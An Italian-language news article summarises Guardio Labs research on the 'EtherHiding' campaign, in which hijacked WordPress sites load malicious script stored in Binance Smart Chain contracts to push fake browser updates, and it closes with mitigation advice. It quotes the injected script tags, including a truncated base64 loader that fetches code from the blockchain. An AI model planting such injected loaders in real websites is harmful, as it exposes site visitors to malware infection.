I criminali informatici stanno impiegando una nuova tecnica di distribuzione di codice malware, denominata “EtherHiding”, che abusa dei Binance’s Smart Chain (BSC) per nascondere script dannosi nella blockchain.
“Negli ultimi due mesi, sfruttando una vasta gamma di siti WordPress dirottati, questo attore di minacce ha indotto gli utenti a scaricare falsi aggiornamenti browser “, affermano i ricercatori di Guardio Labs.
Gli autori delle minacce responsabili di questa campagna hanno utilizzato già in passato gli host Cloudflare Worker per iniettare codice JavaScript nei siti Web compromessi secondo la tecnica denominata “ClearFake“, ma ora avrebbero iniziato ad abusare dei sistemi blockchain per ottenere un canale di distribuzione più evasivo e performante.
Perché usare la blockchain Binance
La blockchain BSC, come noto, è progettata per eseguire app decentralizzate e “Smart contracts” e qualsiasi codice ospitato su di essa non può essere rimosso.
“Mentre Ethereum è una blockchain di proprietà pubblica con funzionalità di criptovaluta e contratti, BSC è di proprietà di Binance e si concentra sui contratti: accordi codificati che eseguono azioni automaticamente quando vengono soddisfatte determinate condizioni. Questi contratti offrono modalità innovative per creare applicazioni e processi. A causa della natura accessibile al pubblico e immutabile della blockchain, il codice può essere ospitato “on-chain” senza possibilità di rimozione.“, commentano Nati Tal , Oleg Zaytsev di Guardio Labs.
Quindi ospitare del codice malevolo su di uno “smart contract” piuttosto che su di un normale servizio di hosting rende più vantaggioso per i criminali informatici allestire attacchi malware imbloccabili, affidabili e non tracciati.
Pertanto quando uno Smart Contract viene implementato su BSC, funziona in modo autonomo e non può essere più interrotto. Anche se venisse segnalato l’indirizzo come dannoso ciò non impedirebbe la distribuzione del codice malware. Guardio Labs afferma che la segnalazione di un indirizzo malevolo attivevrebbe un avviso solo per gli utenti BSC.
“Una volta distribuito su BSC, un contratto intelligente funziona in modo autonomo. Binance non può semplicemente “spegnerlo”. L’unica cosa che possono fare e che attualmente offrono è la capacità della comunità e degli sviluppatori di essere avvisati di un contratto se identificato come dannoso o parte di un’attività illegale.”.
Pertanto i visitatori dei siti WordPress compromessi non vedranno mai tale avviso con tutte le conseguenze del caso.
EtherHiding, una evoluzione della tecnica “ClearFake”
EtherHiding una evoluzione della tecnica “ClearFake”, consente di distribuire codice che viene inserito nei siti Web compromessi allo scopo di visualizzare overlay di falsi aggiornamento browser.
In pratica Guardio Labs spiega come i criminali informatici starebbero prendendo di mira i siti WordPress vulnerabili o con credenziali amministrative compromesse per inserire due tag script nelle pagine web principali. Questi due script iniettati caricherebbero la libreria JS di Binance Smart Chain (BSC), recuperando altro codice malevolo dalla blockchain da inserire sul sito. Il codice recuperato da BSC infatti attiverebbe anche il download del payload di terza fase direttamente dai server C2 degli attaccanti.
<script src=”https://cdn.ethers.io/lib/ethers-5.2.umd.min.js” type=”application/javascript”></script>
<script src=”data:text/javascript;base64,YXN5bmMgZnVuY3Rpb24gbG9hZCgpe2xldCBwcm92aWRlcj1uZXcgZXRoZXJz
LnByb3ZpZGVycy5Kc29uUnBjUHJvdmlkZXIoImh0dHBzOi8vYnNjLWRhdGFzZWVkMS5iaW5hbmNlLm9yZy8iKSxzaWduZXI9cHJvd
[……]b2FkOw==”></script>
È proprio questo payload di terza fase eseguito nel browser dell’utente che mostrerebbe un overlay sul sito che richiede il falso aggiornamento browser. Una volta che la vittima fa click sul pulsante di aggiornamento, viene indirizzata a scaricare l’eseguibile dannoso da Dropbox.
Mitigazioni possibili
L’unico modo per mitigare il problema è puntare sulla sicurezza del proprio sito WordPress, con una corretta gestione delle password amministrative, mantenendo aggiornati i plug-in e rimuovendo account e plug-in inutilizzati.
Nel prossimo futuro l’abuso della blockchain per la distribuzione di payload potrebbe diventare una nuova consuetudine.
Tutti gli IoC sono riportati nell’appendice del rapporto di Guardio Labs.
